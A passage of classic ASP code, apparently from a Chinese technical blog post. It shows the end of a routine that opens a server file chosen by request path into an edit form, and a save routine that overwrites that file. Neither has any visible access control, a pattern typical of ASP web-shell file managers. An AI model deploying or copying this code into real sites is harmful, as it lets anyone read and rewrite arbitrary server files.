If isExist Then 
Set fcnt=fs1.OpenTextFile(fname) 
cnt=fcnt.ReadAll 
fcnt.Close 
Set fs1=Nothing%> 
FILE: <%=fname%> 
<form action="<%=ASP_SELF%>" method="POST"> 
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea> 
<input type="hidden" name="pth" value="<%=fname%>"> 
<input type="hidden" name="ex" value="save"> 
<input type="submit" value="SAVE"> 
</form> 
<%Else%> 
<p>THE FILE IS NOT EXIT or HAVE deleteD.</p> 
<% 
End If 
End Sub 
%> 
<% 
Sub file_save(fname) 
Set fs2=Server.createObject("Scripting.FileSystemObject") 
Set newf=fs2.createTextFile(fname,True) 
newf.Write newcnt 
newf.Close 
Set fs2=Nothing 
Response.Write "<p>THE FILE WAS MODIFIED SUCCESSFULLY.</p>" 
End Sub 
%> 
</body> 
</html> 

分类: 技术文章 标签: ,